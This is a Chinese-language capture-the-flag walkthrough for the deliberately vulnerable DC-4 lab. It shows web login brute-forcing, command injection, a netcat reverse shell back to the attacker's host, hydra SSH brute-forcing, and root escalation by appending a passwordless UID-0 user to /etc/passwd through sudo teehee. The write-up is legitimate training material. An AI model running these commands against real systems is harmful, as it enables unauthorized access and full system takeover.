靶机下载地址:戳我
DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.
作者说惹这次只有一个flag。
0x00 前期工作
使用kali探测存活主机,得到DC-2靶机的ip为192.168.58.130:
fping -g 192.168.58.1/24
探测主机开放了哪些端口:
22端口默认的服务是ssh,80端口默认的服务是web应用。
0x01 获取flag
看一哈80端口的页面:
使用bp爆破,得到用户名为admin,密码是happy:
发现可以执行命令:
抓包,发现存在任意命令执行漏洞:
搞一个连接型后门哈qwq:
nc -nv 192.168.58.134 8032 -e /bin/bash
最后需要提权到root。在/home下有三个文件夹,其中两个是空的,剩下一个/home/jim/backups目录下得到old-passwords.bak,里面是字典。复制到本机重命名成了pass.txt
考虑到22端口还没有利用,使用hydra工具用字典对22端口进行爆破。
hyrda 192.168.58.130 ssh -l jim -P pass.txt -t 6 -v -f
攻击目标:192.168.58.130
使用的模块:ssh
爆破用户名:jim(
-l
)使用的密码字典:pass.txt (
-P
)爆破线程数:6 (
-t
)显示详细信息 (
-V
)爆破成功一个后停止 (
-f
)
host: 192.168.58.130 login: jim password: jibril04
成功连接ssh,康康输入ls命令,有一个mbox,里面是一封信。
切换到/var/mail目录下,有一个jim文件。查看得到charles账号的密码。
变更为其他使用者的身份需要用到su命令。切换到charles后,查看当前账户可以用哪些root权限的命令:
sudo -l
发现可以使用teehee命令而且能免密执行。查询了下该命令的简单使用方法:
-a 参数可以附加内容到指定的文件上(不是覆盖)。
使用teehee命令将一个无密码用户shawroot写入到/etc/passwd文件,并加入到root组中:
echo "shawroot::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
管道符可以将第一条命令的执行结果作为第二条命令的参数。接下来切换账户就可以惹。
su shawroot
cd /root
cat flag.txt
学习了下各位狮虎的wp,发现还有一个非预期解法——CVE-2019-10149进行本地提权,今晚不码了,明天实验试试看。